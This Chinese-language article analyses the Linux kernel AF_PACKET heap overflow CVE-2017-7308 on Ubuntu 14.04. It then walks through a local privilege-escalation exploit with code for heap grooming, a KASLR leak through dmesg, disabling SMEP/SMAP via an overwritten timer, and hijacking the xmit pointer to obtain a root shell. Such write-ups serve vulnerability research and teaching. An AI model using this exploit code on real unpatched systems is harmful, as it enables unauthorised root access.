1. 前言

此漏洞存在于Linux Kernel 4.10.6以下的版本中,本文的测试环境为Ubuntu 14.04 LTS

$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-trusty.git
$ git checkout Ubuntu-lts-4.4.0-31.50_14.04.1

2. 漏洞分析

漏洞发生在net/packet/af_packet.c的packet_set_ring函数中,此函数会在设置ring buffer时被调用。ring buffer是用于数据包处理的缓冲区,其中rx_ring是接收数据的缓冲区,tx_ring是传输数据的缓冲区(本文只用到rx_ring),二者分别可以通过setsockopt的PACKET_RX_RING和PACKET_TX_RING参数进行设置。packet_ring_buffer定义如下:

/*
 * Ring buffer descriptor as quoted in this write-up; only the two members
 * the article refers to are listed here.
 */
struct packet_ring_buffer {
    struct pgv *pg_vec;                  /* array of blocks, indexed as pg_vec[i].buffer */
    struct tpacket_kbdq_core prb_bdqc;   /* block-descriptor-queue state used for TPACKET_V3 */
};

/* One entry of the pg_vec array: points at the memory of a single block. */
struct pgv {
    char *buffer;
};

1.png-17kB

接下来看导致漏洞的代码

/*
 * Sanity check quoted from packet_set_ring(): for TPACKET_V3 it is meant to
 * reject a request whose block header plus private area does not fit inside
 * one block.
 * NOTE(review): the subtraction wraps around before the (int) cast, so a
 * tp_sizeof_priv with the top bit set can still produce a positive result
 * and pass this test, as the article's worked example shows.
 */
if (po->tp_version >= TPACKET_V3 &&
	(int)(req->tp_block_size -
	  BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
	goto out;

当PACKET_VERSION为TPACKET_V3时,(int)(req->tp_block_size - BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0 这个检测会由于符号问题而被绕过:减法在无符号整数上进行,结果回绕之后再转换为int仍然可能是正数,例如:

A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0

这样就会在之后导致一系列问题,在init_prb_bdqc函数中

/*
 * Excerpt from net/packet/af_packet.c (omitted lines are marked "..."):
 * initialises the TPACKET_V3 block-descriptor queue that belongs to ring
 * buffer @rb, using block array @pg_vec and the user-supplied request @req_u.
 */
static void init_prb_bdqc(struct packet_sock *po,
			struct packet_ring_buffer *rb,
			struct pgv *pg_vec,
			union tpacket_req_u *req_u)
{
	struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
	struct tpacket_block_desc *pbd;

	memset(p1, 0x0, sizeof(*p1));

	p1->knxt_seq_num = 1;
	p1->pkbdq = pg_vec;
	pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
	p1->pkblk_start	= pg_vec[0].buffer;
	p1->kblk_size = req_u->req3.tp_block_size;
	p1->knum_blocks	= req_u->req3.tp_block_nr;
	...
	/*
	 * The article notes blk_sizeof_priv is an unsigned short while
	 * tp_sizeof_priv is an unsigned int, so only the low 16 bits survive.
	 */
	p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;

	/*
	 * If BLK_PLUS_PRIV(blk_sizeof_priv) exceeds kblk_size this difference
	 * becomes a very large value instead of a small frame limit.
	 */
	p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
	prb_init_ft_ops(p1, req_u);
	prb_setup_retire_blk_timer(po);
	prb_open_block(p1, pbd);
}

p1->blk_sizeof_priv的类型为unsigned short,而req_u->req3.tp_sizeof_priv的类型为unsigned int,在转换后只会取低两个字节的值,由于之前的检测绕过问题这里可以给p1->blk_sizeof_priv赋任意值,这样如果BLK_PLUS_PRIV(p1->blk_sizeof_priv) > p1->kblk_size就可以把p1->max_frame_len赋值为一个很大的值来绕过很多检测,在之后的prb_open_block函数中

/*
 * Excerpt (omitted lines are marked "..."): makes @pbd1 the current block of
 * queue @pkc1 and positions the write cursor inside it.
 */
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
	struct tpacket_block_desc *pbd1)
{
    ...
	pkc1->pkblk_start = (char *)pbd1;
	/*
	 * The cursor starts after the block header plus the private area, so it
	 * is derived directly from the request-controlled blk_sizeof_priv.
	 */
	pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
    ...
}

pkc1->nxt_offset指向缓冲区ring_buffer的block中当前可接收数据的起始地址,由于pkc1->blk_sizeof_priv可控,因此可以控制pkc1->nxt_offset,在接收数据包时造成堆越界。

3. 漏洞利用

EXP参考https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c ,由于测试环境的内核版本是4.4,因此需要修改几处偏移。主要思路是通过堆越界覆盖packet_sock结构体中的成员packet_sock->xmit和packet_sock->rx_ring->prb_bdqc->retire_blk_timer,因此要进行堆布局,构造连续的多个packet_sock结构体,使前一个packet_sock->rx_ring->prb_bdqc->nxt_offset指向后面的packet_sock结构体中的上述两个成员。

3.1 安装沙盒

要对更底层的网络进行操作,需要有CAP_NET_RAW权限,可以通过用户命名空间(user namespace)配合网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y

/*
 * Prepare the environment the rest of the program runs in:
 *   1. enter a new user namespace, then a new network namespace;
 *   2. write "deny" to setgroups and map the caller's uid/gid to id 0
 *      inside the new user namespace;
 *   3. restrict the process to CPU 0;
 *   4. bring the loopback interface up.
 * Any failure prints a diagnostic with perror() and terminates the process
 * with EXIT_FAILURE, so the function returns only when every step succeeded.
 */
void setup_sandbox(void) {
    /* Read before unshare(): these are the ids written into the maps below. */
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    /* The message now names the same path that is actually written. */
    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

    /* Affinity mask containing only CPU 0, applied to the calling process. */
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
        perror("[-] sched_setaffinity()");
        exit(EXIT_FAILURE);
    }

    if (system("/sbin/ifconfig lo up") != 0) {
        perror("[-] system(/sbin/ifconfig lo up)");
        exit(EXIT_FAILURE);
    }
}

3.2 绕过KASLR

由于没有对dmesg做限制,因此会有残留的syslog能够泄漏出内核地址

$ dmesg | grep 'Freeing SMP'
[    0.022785] Freeing SMP alternatives memory: 28K (ffffffff81e83000 - ffffffff81e8a000)

3.3 堆布局

packet_sock结构体会在用户层创建socket时在内核创建,它通过kmalloc分配空间,kmalloc底层通过slab allocator进行分配。为了提升性能、减少重复的申请和释放,会用多个slab组成一个对应特定大小的缓存,在释放操作时并不会真正地释放,而是放入缓存并修改成未使用状态,等下一次有相同大小的内存申请时直接从缓存返回,而不需要再次真正地申请物理内存,缓存对应的大小为2^n。4.4版本内核的packet_sock大小为1408

$ pahole -C packet_sock src/ubuntu-trusty/vmlinux
struct packet_sock {
	struct sock                sk;                   /*     0   704 */
	/* --- cacheline 11 boundary (704 bytes) --- */
	struct packet_fanout *     fanout;               /*   704     8 */
	union tpacket_stats_u      stats;                /*   712    12 */

	/* XXX 4 bytes hole, try to pack */

	struct packet_ring_buffer  rx_ring;              /*   728   232 */
	/* --- cacheline 15 boundary (960 bytes) --- */
	struct packet_ring_buffer  tx_ring;              /*   960   232 */
	/* --- cacheline 18 boundary (1152 bytes) was 40 bytes ago --- */
	int                        copy_thresh;          /*  1192     4 */
	spinlock_t                 bind_lock;            /*  1196     4 */
	struct mutex               pg_vec_lock;          /*  1200    40 */
	/* --- cacheline 19 boundary (1216 bytes) was 24 bytes ago --- */
	unsigned int               running:1;            /*  1240:31  4 */
	unsigned int               auxdata:1;            /*  1240:30  4 */
	unsigned int               origdev:1;            /*  1240:29  4 */
	unsigned int               has_vnet_hdr:1;       /*  1240:28  4 */

	/* XXX 28 bits hole, try to pack */

	int                        pressure;             /*  1244     4 */
	int                        ifindex;              /*  1248     4 */
	__be16                     num;                  /*  1252     2 */

	/* XXX 2 bytes hole, try to pack */

	struct packet_rollover *   rollover;             /*  1256     8 */
	struct packet_mclist *     mclist;               /*  1264     8 */
	atomic_t                   mapped;               /*  1272     4 */
	enum tpacket_versions      tp_version;           /*  1276     4 */
	/* --- cacheline 20 boundary (1280 bytes) --- */
	unsigned int               tp_hdrlen;            /*  1280     4 */
	unsigned int               tp_reserve;           /*  1284     4 */
	unsigned int               tp_loss:1;            /*  1288:31  4 */
	unsigned int               tp_tx_has_off:1;      /*  1288:30  4 */

	/* XXX 30 bits hole, try to pack */

	unsigned int               tp_tstamp;            /*  1292     4 */
	struct net_device *        cached_dev;           /*  1296     8 */
	int                        (*xmit)(struct sk_buff *); /*  1304     8 */

	/* XXX 32 bytes hole, try to pack */

	/* --- cacheline 21 boundary (1344 bytes) --- */
	struct packet_type         prot_hook;            /*  1344    56 */

	/* size: 1408, cachelines: 22, members: 27 */
	/* sum members: 1362, holes: 3, sum holes: 38 */
	/* bit holes: 2, sum bit holes: 58 bits */
	/* padding: 8 */
};

由于1024 < 1408 < 2048,packet_sock会使用kmalloc-2048缓存,这个缓存使用0x8000大小的slab。这样先申请512个socket使kmalloc-2048缓存耗尽,再创建一个带有1024个块、每块大小为0x8000的ring_buffer的packet_sock,申请这些block会使page allocator的freelist中相应大小的页耗尽。因为申请物理页的大小也是按2^n计算,这样之后再申请时,就会从第一个满足m > n且freelist不为空的2^m大小的页中分割内存

/* Count passed to kmalloc_pad(); the article uses it to drain the kmalloc-2048 cache. */
#define KMALLOC_PAD 512
/* Count passed to pagealloc_pad(); the article uses it to drain the page allocator freelist. */
#define PAGEALLOC_PAD 1024

/* Warm-up step: both padding helpers run before the target sockets are created. */
kmalloc_pad(KMALLOC_PAD);
pagealloc_pad(PAGEALLOC_PAD);

3.4 绕过SMEP和SMAP

完成预热后申请一个packet_sock,并且为它设置一个有两个块、每块大小为0x8000的ring_buffer,再申请多个连续的packet_sock。由于kmalloc-2048缓存和freelist中相应大小的页都已耗尽,它们会有很大机会在更大的页上被连续地分配

2.png-18.7kB

绕过SMEP和SMAP只需把CR4寄存器的第20和第21位赋值为0

3.png-28.4kB

具体代码如下:

/* Added to KERNEL_BASE to form the function pointer passed to oob_timer_execute(). */
#define NATIVE_WRITE_CR4 0x61220ul
/* Argument handed to that function; bits 20 and 21 of this value are zero. */
#define CR4_DESIRED_VALUE 0x407f0ul
/* NOTE(review): presumably the byte offset of retire_blk_timer inside packet_sock for this kernel build — confirm. */
#define TIMER_OFFSET 880

/*
 * Build the tp_sizeof_priv value for the requested write position and create
 * the packet socket that uses it.
 *   offset - distance added on top of the 0x8000-byte block; callers pass
 *            values of the form 2048 + <member offset> - <lead-in>.
 * Returns whatever packet_socket_setup() returns.
 */
int oob_setup(int offset) {
    const unsigned int maclen = ETH_HDR_LEN;
    /* Space kept in front of the network header: at least 16 bytes. */
    const unsigned int reserve = (maclen < 16 ? 16 : maclen);
    const unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN + reserve);
    const unsigned int macoff = netoff - maclen;

    /* Two top bits set; the remaining terms select where the copy lands. */
    const unsigned int high_bits = (1u<<31) + (1u<<30);
    unsigned int sizeof_priv =
        high_bits + 0x8000 - BLK_HDR_LEN - macoff + offset;

    return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}

/*
 * Writes a timer_list image carrying func/arg over memory that follows the
 * ring block, then waits one second.
 *   func - stored in timer_list.function
 *   arg  - stored in timer_list.data
 */
void oob_timer_execute(void *func, unsigned long arg) {
    /* 2048 skips one neighbouring object; TIMER_OFFSET - 8 leaves an 8-byte lead-in before the timer. */
    oob_setup(2048 + TIMER_OFFSET - 8);

    /*
     * 32 further sockets, each with its timer scheduled.
     * NOTE(review): 1000 is presumably a timeout in milliseconds — confirm
     * against packet_sock_timer_schedule().
     */
    int i;
    for (i = 0; i < 32; i++) {
        int timer = packet_sock_kmalloc();
        packet_sock_timer_schedule(timer, 1000);
    }

    /* Zeroed payload buffer; the timer image starts at byte 8. */
    char buffer[2048];
    memset(&buffer[0], 0, sizeof(buffer));

    struct timer_list *timer = (struct timer_list *)&buffer[8];
    timer->function = func;
    timer->data = arg;
    timer->flags = 1;

    /* The first two bytes are skipped; the article attributes this to alignment (offset -6 instead of -8). */
    oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);

    /* NOTE(review): presumably waits for the scheduled timer to expire — confirm. */
    sleep(1);
}

oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);

这里是覆盖packet_sock->rx_ring->prb_bdqc->retire_blk_timer,由于会在retire timer超时后调用retire_blk_timer->function(retire_blk_timer->data),这样就可以通过native_write_cr4(X)来绕过SMEP和SMAP。另外再说一下sizeof_priv的计算,tpacket接收数据包时会调用tpacket_rcv函数

/*
 * Excerpt of the receive path (omitted lines are marked "..."): obtains a
 * frame slot from the ring and copies the packet bytes into it.
 */
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
		       struct packet_type *pt, struct net_device *orig_dev)
{
    ...
    /* Slot for macoff + snaplen bytes, taken from the socket's rx ring. */
    h.raw = packet_current_rx_frame(po, skb, TP_STATUS_KERNEL, (macoff+snaplen));
    ...
    /* snaplen bytes of the skb are written starting at h.raw + macoff. */
    skb_copy_bits(skb, 0, h.raw + macoff, snaplen);
    ...
}

/*
 * Excerpt (omitted lines are marked "..."): selects the frame-lookup routine
 * according to the socket's tp_version. Only the TPACKET_V3 case is shown.
 */
static void *packet_current_rx_frame(struct packet_sock *po,
					    struct sk_buff *skb,
					    int status, unsigned int len)
{
	char *curr = NULL;
	switch (po->tp_version) {
    ...
	case TPACKET_V3:
		/* V3 rings hand out space from the current block. */
		return __packet_lookup_frame_in_block(po, skb, status, len);
    ...
	}
}

/*
 * Excerpt (omitted lines are marked "..."): returns the address at which a
 * frame of @len bytes is to be stored, taken from the current block when it
 * fits and otherwise from the next block.
 */
static void *__packet_lookup_frame_in_block(struct packet_sock *po,
					    struct sk_buff *skb,
						int status,
					    unsigned int len
					    )
{
	struct tpacket_kbdq_core *pkc;
	struct tpacket_block_desc *pbd;
	char *curr, *end;

	pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
	pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);

	...
	/* curr: write cursor of the current block; end: pbd plus the block size. */
	curr = pkc->nxt_offset;
	pkc->skb = skb;
	end = (char *)pbd + pkc->kblk_size;

	/* first try the current block */
	if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}

	/* Ok, close the current block */
	prb_retire_current_block(pkc, po, 0);

	/* Now, try to dispatch the next block */
	/* The returned cursor is used without being compared against the new block's end. */
	curr = (char *)prb_dispatch_next_block(pkc, po);
	if (curr) {
		pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}
    ...
}

/*
 * Excerpt (omitted lines are marked "..."): opens a block via
 * prb_open_block() and returns the queue's resulting nxt_offset.
 */
static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc,
		struct packet_sock *po)
{
    ...
	prb_open_block(pkc, pbd);
	return (void *)pkc->nxt_offset;
}

__packet_lookup_frame_in_block会返回当前缓冲区中可接收数据的起始地址。由于此时并不满足curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end(nxt_offset已经指到了第一个块之外),之后就会从第二个块中找空余的空间(这也是上面创建两个块的原因)。blk_sizeof_priv = 0x8000 - BLK_HDR_LEN - macoff + 2048 + TIMER_OFFSET - 8会在计算p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv)时使p1->max_frame_len为一个很大的值,以此来绕过后面的一些检测。h.raw = pg_vec[1].buffer + blk_sizeof_priv + BLK_HDR_LEN = pg_vec[1].buffer + 0x8000 - macoff + 2048 + TIMER_OFFSET - 8,调用skb_copy_bits(skb, 0, h.raw + macoff, snaplen)把数据复制到缓存区时的起始地址为pg_vec[1].buffer + 0x8000 + 2048 + TIMER_OFFSET - 8,即越过整个块(0x8000)并跳过后面紧跟的一个packet_sock(2048),这样最终的复制起始地址为后面紧跟的第二个packet_sock + TIMER_OFFSET - 6(由于对齐导致是-6,为了把一些值置为0)

image.png-106.9kB

0xffff8800346c0b6a刚好在前面创建的32个packet_sock中

image.png-96kB

memcpy后成功覆盖了retire_blk_timer

image.png-41.4kB

3.5 提权

跟上一步类似,只是这里覆盖packet_sock的xmit函数指针,它会在发送数据时被调用,在关闭SMEP后返回到用户空间执行commit_creds(prepare_kernel_cred(0))实现提权

/* Matches the offset of the xmit member in the pahole listing of packet_sock (1304). */
#define XMIT_OFFSET 1304

/*
 * Writes func over memory that follows the ring block, positioned with
 * XMIT_OFFSET, then runs packet_sock_id_match_trigger() on every socket
 * created here.
 *   func - pointer value placed at byte 64 of the payload
 */
void oob_id_match_execute(void *func) {
    /* 2048 skips one neighbouring object; XMIT_OFFSET - 64 leaves a 64-byte lead-in before xmit. */
    /* NOTE(review): s is never read afterwards; the socket is simply left open. */
    int s = oob_setup(2048 + XMIT_OFFSET - 64);

    int ps[32];

    int i;
    for (i = 0; i < 32; i++)
        ps[i] = packet_sock_kmalloc();

    /* Zeroed payload buffer; the pointer is stored at byte 64. */
    char buffer[2048];
    memset(&buffer[0], 0, 2048);

    void **xmit = (void **)&buffer[64];
    *xmit = func;

    /* As in oob_timer_execute(), the first two bytes of the buffer are skipped. */
    oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);

    /* Every socket is triggered, whichever of them was actually overwritten. */
    for (i = 0; i < 32; i++)
        packet_sock_id_match_trigger(ps[i]);
}

oob_id_match_execute((void *)&get_root_payload);

3.6 恢复网络

由于隔离了网络命名空间,导致只有一个回环接口不能连接网络

image.png-105.5kB

但是现在是root权限,因此可以加入到init进程的网络命名空间来恢复网络

/*
 * Join the network namespace of PID 1 and replace the current process with
 * an interactive /bin/bash.
 *
 * Does not return: on success the process image is replaced, and on any
 * failure a diagnostic is printed with perror() and the process exits with
 * EXIT_FAILURE.
 */
void exec_shell(void) {
    char *shell = "/bin/bash";
    char *args[] = {shell, "-i", NULL};

    int fd = open("/proc/1/ns/net", O_RDONLY);
    if (fd == -1) {
        perror("error opening /proc/1/ns/net");
        exit(EXIT_FAILURE);
    }

    if (setns(fd, CLONE_NEWNET) == -1) {
        perror("error calling setns");
        close(fd);
        exit(EXIT_FAILURE);
    }

    /* The descriptor is only needed for setns(); do not leak it into the shell. */
    close(fd);

    /* envp is NULL, as in the original call. */
    execve(shell, args, NULL);

    /* execve() returns only on failure. */
    perror("error calling execve");
    exit(EXIT_FAILURE);
}

image.png-208kB

4. 参考

  1. https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
  2. https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
  3. https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308
  4. http://blog.nsfocus.net/gdb-kgdb-debug-application/
  5. http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/